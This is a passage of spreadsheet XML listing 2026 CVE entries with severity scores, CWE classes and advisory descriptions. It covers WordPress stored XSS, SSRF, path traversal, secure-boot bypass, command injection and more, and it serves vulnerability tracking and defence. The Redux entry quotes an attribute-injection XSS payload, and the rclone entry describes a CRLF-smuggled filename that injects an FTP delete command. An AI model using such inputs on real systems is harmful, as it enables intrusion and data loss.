      <c r="H4162" s="5" t="inlineStr"/>
      <c r="I4162" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4162" s="5" t="inlineStr"/>
      <c r="K4162" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4162" s="5" t="inlineStr">
        <is>
          <t>The Divi theme for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the `image_src` attribute of the `et_pb_video_slider_item` shortcode in all versions up to, and including, 4.27.6. This is due to the `image_src` field not being included in the `$url_options` whitelist (which only contains `url`, `button_link`, `button_url`), so it never receives `esc_url_raw()` at save time. On the server side, the value is rendered into a `data-image` HTML attribute using `esc_attr()`, which encodes double quotes as `&amp;quot;`. However, the client-side JavaScript carousel code in `custom.unified.js` reads this attribute using jQuery's `.data('image')`, which returns the browser-decoded value (with `&amp;quot;` decoded back to `"`). The decoded value is then concatenated directly into an HTML string and injected into the DOM via `jQuery.after()` without re-escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user hovers over the carousel thumbnail.</t>
        </is>
      </c>
      <c r="M4162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3853</t>
        </is>
      </c>
    </row>
    <row r="4163">
      <c r="A4163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45573</t>
        </is>
      </c>
      <c r="C4163" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4163" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4163" s="5" t="inlineStr"/>
      <c r="F4163" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4163" s="5" t="inlineStr"/>
      <c r="H4163" s="5" t="inlineStr"/>
      <c r="I4163" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J4163" s="5" t="inlineStr"/>
      <c r="K4163" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4163" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.30.9, from 0.31.0 before 0.31.5, and in 0.32.0.rc1 before 0.32.0.rc2, when VAPID delivery is enabled, the notification subscription flow stores a client-supplied push endpoint without validating that it belongs to an approved push service, and SendPushNotification later passes that endpoint to WebPush.payload_send, allowing an authenticated user to create stored, mostly blind server-side requests to arbitrary reachable HTTPS endpoints. This issue is fixed in versions 0.30.9, 0.31.5, and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M4163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45573</t>
        </is>
      </c>
    </row>
    <row r="4164">
      <c r="A4164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4657</t>
        </is>
      </c>
      <c r="C4164" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4164" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4164" s="5" t="inlineStr"/>
      <c r="F4164" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4164" s="5" t="inlineStr"/>
      <c r="H4164" s="5" t="inlineStr"/>
      <c r="I4164" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4164" s="5" t="inlineStr"/>
      <c r="K4164" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4164" s="5" t="inlineStr">
        <is>
          <t>The Easy Google Fonts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the control_selectors meta field in all versions up to, and including, 2.0.4. This is due to the plugin registering the control_selectors meta field with show_in_rest enabled but without a sanitize_callback, and subsequently outputting this unsanitized data directly into &lt;style&gt; tags on the frontend without proper escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4657</t>
        </is>
      </c>
    </row>
    <row r="4165">
      <c r="A4165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47699</t>
        </is>
      </c>
      <c r="C4165" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4165" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4165" s="5" t="inlineStr"/>
      <c r="F4165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4165" s="5" t="inlineStr"/>
      <c r="H4165" s="5" t="inlineStr"/>
      <c r="I4165" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4165" s="5" t="inlineStr"/>
      <c r="K4165" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="L4165" s="5" t="inlineStr">
        <is>
          <t>Confidential Containers Guest Components provides guest tools and components for confidential container workloads. From 0.16.0 until 0.20.0, a crafted OCI image layer can make image_rs::stream::unpack::unpack() create a hardlink outside its destination directory. In image-rs/src/stream/unpack.rs, try_hardlink_fallback() validates the hardlink source but computes the destination with destination.join(&amp;entry_rel). Rust Path::join replaces the base when entry_rel is an absolute tar entry path, so fs::hard_link(&amp;src_canon, &amp;dst_entry_abs) can write attacker-controlled content to an arbitrary absolute path. In Confidential Containers the workload owner already controls trusted image content, so the issue is a workload-owner escape into the pod virtual machine rather than a crossing of the image trust boundary, but it may enable access to pod virtual machine capabilities and attestation abuse. This issue is fixed in version 0.20.0.</t>
        </is>
      </c>
      <c r="M4165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47699</t>
        </is>
      </c>
    </row>
    <row r="4166">
      <c r="A4166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50720</t>
        </is>
      </c>
      <c r="C4166" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4166" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4166" s="5" t="inlineStr"/>
      <c r="F4166" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4166" s="5" t="inlineStr"/>
      <c r="H4166" s="5" t="inlineStr"/>
      <c r="I4166" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4166" s="5" t="inlineStr"/>
      <c r="K4166" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L4166" s="5" t="inlineStr">
        <is>
          <t>The Ingenic T31 SoC boot ROM flash-boot verification path compares only a single 32-bit word of the RSA signature output against a single 32-bit word of the SHA-256 payload digest, rather than compare the full data. This allows an attacker with physical write access to boot media to forge modified SPL (Secondary Program Loader) images that pass secure boot verification without possession of the OEM signing key. Each forgery attempt succeeds with approximately 2/3 probability. This has been validated via reverse engineering, software emulation against vendor-signed images, and end-to-end hardware acceptance of a forged firmware image on a Wyze Video Doorbell v2 (T31X).</t>
        </is>
      </c>
      <c r="M4166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50720</t>
        </is>
      </c>
    </row>
    <row r="4167">
      <c r="A4167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5399</t>
        </is>
      </c>
      <c r="C4167" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4167" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4167" s="5" t="inlineStr"/>
      <c r="F4167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4167" s="5" t="inlineStr"/>
      <c r="H4167" s="5" t="inlineStr"/>
      <c r="I4167" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4167" s="5" t="inlineStr"/>
      <c r="K4167" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4167" s="5" t="inlineStr">
        <is>
          <t>The Redux Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Slider field in User Profile settings in versions up to and including 4.5.13.1. This is due to insufficient input sanitization in the user_meta_save() function (which only sanitizes array values, not scalar values) and improper output escaping in the Redux_Slider::render() method, which outputs slider values into unquoted HTML attributes. The vulnerability also exploits the fact that the clean_default() method only casts values to numeric types when they are empty or out of bounds, allowing malicious strings like '1 tabindex=0 autofocus onfocus=alert(1) x=' to pass validation through PHP's loose type comparison. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts into their user profile that will execute whenever an Administrator navigates to view the attacker's profile page.</t>
        </is>
      </c>
      <c r="M4167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5399</t>
        </is>
      </c>
    </row>
    <row r="4168">
      <c r="A4168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54743</t>
        </is>
      </c>
      <c r="C4168" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4168" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4168" s="5" t="inlineStr"/>
      <c r="F4168" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4168" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4168" s="5" t="inlineStr"/>
      <c r="I4168" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4168" s="5" t="inlineStr"/>
      <c r="K4168" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4168" s="5" t="inlineStr">
        <is>
          <t>Lemmy is a link aggregator and forum for the fediverse. Prior to lemmy-ui 0.19.19-beta.1, LemmyNet/lemmy-ui renders Markdown in src/shared/markdown.ts for post bodies, comment bodies, private messages, and community and site sidebars through mdToHtml, which returns a raw __html object that Inferno injects without a sanitizer pass. setupMarkdown configures html as false but registers markdown-it-html5-embed@1.0.0 with useImageSyntax enabled, so an image targeting video media becomes a video element whose fallback incorporates the image alt text through unescaped string replacement. The html setting does not apply to plugin-generated output, allowing crafted alt text to reach the DOM as live HTML in contexts that do not use mdToHtmlNoImages. An approved member or a remote federated instance can store such content, and a viewer who renders it may execute JavaScript in the lemmy-ui origin, exposing the viewer's session and authenticated actions. The advisory notes that Content Security Policy prevents the described exploit in production, but also states that the tested default self-hosted deployment serves no Content-Security-Policy. This issue is fixed in lemmy-ui version 0.19.19-beta.1.</t>
        </is>
      </c>
      <c r="M4168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54743</t>
        </is>
      </c>
    </row>
    <row r="4169">
      <c r="A4169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54746</t>
        </is>
      </c>
      <c r="C4169" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4169" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4169" s="5" t="inlineStr"/>
      <c r="F4169" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4169" s="5" t="inlineStr"/>
      <c r="H4169" s="5" t="inlineStr"/>
      <c r="I4169" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4169" s="5" t="inlineStr"/>
      <c r="K4169" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L4169" s="5" t="inlineStr">
        <is>
          <t>Hatchet is a platform for orchestrating background tasks, AI agents, and durable workflows at scale. From 0.40.0 until 0.91.1, the Dispatcher gRPC service does not verify that a request's worker ID belongs to the tenant identified by the bearer-token context in Dispatcher/UpsertWorkerLabels and Dispatcher/Unsubscribe. An authenticated owner of any tenant who guesses another tenant's worker UUID can overwrite that worker's affinity labels or disconnect the worker from the dispatcher. This can cause cross-tenant integrity impact and denial of service on multi-tenant Hatchet Cloud or shared self-hosted deployments. Single-tenant deployments are not practically affected because the attacker and target tenant are the same. This issue is fixed in version 0.91.1.</t>
        </is>
      </c>
      <c r="M4169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54746</t>
        </is>
      </c>
    </row>
    <row r="4170">
      <c r="A4170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62861</t>
        </is>
      </c>
      <c r="C4170" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4170" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4170" s="5" t="inlineStr"/>
      <c r="F4170" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4170" s="5" t="inlineStr"/>
      <c r="H4170" s="5" t="inlineStr"/>
      <c r="I4170" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4170" s="5" t="inlineStr"/>
      <c r="K4170" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L4170" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Prior to 3.18.0, any authenticated non-guest workspace member can remove another workspace's public custom domain and make typebots on that domain unavailable. The custom-domain delete handler in handleDeleteCustomDomain.ts authorizes a caller against a client-supplied workspaceId but sends the client-supplied domain name to the shared Vercel project before verifying that the domain belongs to that workspace. This issue is fixed in version 3.18.0.</t>
        </is>
      </c>
      <c r="M4170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62861</t>
        </is>
      </c>
    </row>
    <row r="4171">
      <c r="A4171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6640</t>
        </is>
      </c>
      <c r="C4171" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4171" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4171" s="5" t="inlineStr"/>
      <c r="F4171" s="5" t="inlineStr"/>
      <c r="G4171" s="5" t="inlineStr"/>
      <c r="H4171" s="5" t="inlineStr"/>
      <c r="I4171" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4171" s="5" t="inlineStr"/>
      <c r="K4171" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4171" s="5" t="inlineStr">
        <is>
          <t>The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mla_link_attributes' parameter in all versions up to, and including, 3.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6640</t>
        </is>
      </c>
    </row>
    <row r="4172">
      <c r="A4172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6641</t>
        </is>
      </c>
      <c r="C4172" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4172" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4172" s="5" t="inlineStr"/>
      <c r="F4172" s="5" t="inlineStr"/>
      <c r="G4172" s="5" t="inlineStr"/>
      <c r="H4172" s="5" t="inlineStr"/>
      <c r="I4172" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4172" s="5" t="inlineStr"/>
      <c r="K4172" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4172" s="5" t="inlineStr">
        <is>
          <t>The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mla_gallery' shortcode in versions up to and including 3.35. This is due to insufficient input sanitization and output escaping on the mla_link_href parameter when mla_output is set to 'paginate_links', where the _paginate_links() function processes the value through mla_process_shortcode_parameter() and _replace_query_parameter() without proper URL escaping, then outputs it directly in href attributes without applying esc_url(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6641</t>
        </is>
      </c>
    </row>
    <row r="4173">
      <c r="A4173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6642</t>
        </is>
      </c>
      <c r="C4173" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4173" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4173" s="5" t="inlineStr"/>
      <c r="F4173" s="5" t="inlineStr"/>
      <c r="G4173" s="5" t="inlineStr"/>
      <c r="H4173" s="5" t="inlineStr"/>
      <c r="I4173" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4173" s="5" t="inlineStr"/>
      <c r="K4173" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4173" s="5" t="inlineStr">
        <is>
          <t>The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the bulk edit preset export/import mechanism in versions up to and including 3.35. This is due to insufficient output escaping on preset field values when they are rendered in HTML attribute contexts in the mla_generate_bulk_edit_form_fieldsets() function and mla-bulk-edit-fieldsets.tpl template. While wp_kses() filtering is applied during preset export for users without unfiltered_html capability, this does not prevent attribute injection attacks since the malicious payload consists of quotes and HTML attributes rather than HTML tags. When preset values are retrieved and rendered, they are directly assigned to template variables without esc_attr() escaping and then inserted into input element value attributes via simple string replacement. This makes it possible for authenticated attackers, with Author-level access and above (upload_files capability), to inject arbitrary web scripts that execute when an administrator imports the poisoned preset and the targeted input field receives focus.</t>
        </is>
      </c>
      <c r="M4173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6642</t>
        </is>
      </c>
    </row>
    <row r="4174">
      <c r="A4174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66760</t>
        </is>
      </c>
      <c r="C4174" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4174" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4174" s="5" t="inlineStr"/>
      <c r="F4174" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4174" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H4174" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I4174" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4174" s="5" t="inlineStr"/>
      <c r="K4174" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L4174" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not correctly validate client certificates in certain callback flows. An attacker with low privileges, holding a certificate from the same trusted authority with matching subject values, could bypass the identity check. This complexity makes the attack difficult to execute. Successful exploitation could allow impersonation of a trusted internal component, resulting in a high impact on integrity and a low impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="M4174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66760</t>
        </is>
      </c>
    </row>
    <row r="4175">
      <c r="A4175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69878</t>
        </is>
      </c>
      <c r="C4175" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4175" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4175" s="5" t="inlineStr"/>
      <c r="F4175" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4175" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4175" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I4175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4175" s="5" t="inlineStr"/>
      <c r="K4175" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L4175" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M4175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69878</t>
        </is>
      </c>
    </row>
    <row r="4176">
      <c r="A4176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70582</t>
        </is>
      </c>
      <c r="C4176" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4176" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4176" s="5" t="inlineStr"/>
      <c r="F4176" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4176" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4176" s="5" t="inlineStr"/>
      <c r="I4176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4176" s="5" t="inlineStr"/>
      <c r="K4176" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L4176" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M4176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70582</t>
        </is>
      </c>
    </row>
    <row r="4177">
      <c r="A4177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71311</t>
        </is>
      </c>
      <c r="C4177" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4177" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4177" s="5" t="inlineStr"/>
      <c r="F4177" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4177" s="5" t="inlineStr"/>
      <c r="H4177" s="5" t="inlineStr"/>
      <c r="I4177" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4177" s="5" t="inlineStr"/>
      <c r="K4177" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L4177" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. Prior to 1.75.0, a valid but nondefault FTP filename encoding in backend/ftp/ftp.go can restore raw CR/LF immediately before an attacker-controlled path is interpolated into the line-oriented FTP control channel, and github.com/jlaffaye/ftp formats the argument through textproto.Conn.Cmd without rejecting CR or LF, allowing a filename such as victim CRLF DELE other-secret CRLF NOOP to inject an independent authenticated FTP command when the victim copies or syncs to a more-privileged FTP destination. This issue is fixed in 1.75.0.</t>
        </is>
      </c>
      <c r="M4177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71311</t>
        </is>
      </c>
    </row>
    <row r="4178">
      <c r="A4178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71338</t>
        </is>
      </c>
      <c r="C4178" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4178" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4178" s="5" t="inlineStr"/>
      <c r="F4178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4178" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4178" s="5" t="inlineStr"/>
      <c r="I4178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4178" s="5" t="inlineStr"/>
      <c r="K4178" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L4178" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Failover Cluster allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M4178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71338</t>
        </is>
      </c>
    </row>
    <row r="4179">
      <c r="A4179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72720</t>
        </is>
      </c>
      <c r="C4179" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4179" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4179" s="5" t="inlineStr"/>
      <c r="F4179" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4179" s="5" t="inlineStr"/>
      <c r="H4179" s="5" t="inlineStr"/>
      <c r="I4179" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J4179" s="5" t="inlineStr"/>
      <c r="K4179" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4179" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.7, 2026.6.2, 2026.7.1, and 2026.8.0-latest.1, Discourse has HTML injection in PrettyText.format_for_email because cooked attribute values are reparsed as markup. Crafted Vimeo iframe sources, secure-upload URLs or dimensions, and hashtag data-slug values can cause decoded attribute text to be reinterpreted as HTML. The vulnerable conversion also fails to strictly validate the Vimeo iframe host and path, allowing non-Vimeo allowlisted iframes to be converted. This issue is fixed in versions 2026.1.7, 2026.6.2, 2026.7.1, and 2026.8.0-latest.1.</t>
        </is>
      </c>
      <c r="M4179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72720</t>
        </is>
      </c>
    </row>
    <row r="4180">
      <c r="A4180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72881</t>
        </is>
      </c>
      <c r="C4180" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4180" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4180" s="5" t="inlineStr"/>
      <c r="F4180" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4180" s="5" t="inlineStr">
        <is>
          <t>postgresql, mysql, mongodb</t>
        </is>
      </c>
      <c r="H4180" s="5" t="inlineStr"/>
      <c r="I4180" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J4180" s="5" t="inlineStr"/>
      <c r="K4180" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L4180" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, database backup and restore command builders in packages/server/src/utils/backups/utils.ts and packages/server/src/utils/restore/utils.ts interpolate database names, usernames, and passwords into nested shell command strings passed to child_process.exec(). An authenticated administrator with permission to create databases and configure backups can use crafted database configuration fields to execute arbitrary commands inside PostgreSQL, MariaDB, MySQL, MongoDB, or LibSQL containers, exposing database data and credentials and potentially enabling escape when a container is overprivileged. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M4180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72881</t>
        </is>
      </c>
    </row>
    <row r="4181">
      <c r="A4181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72947</t>
        </is>
      </c>
      <c r="C4181" s="5" t="n">
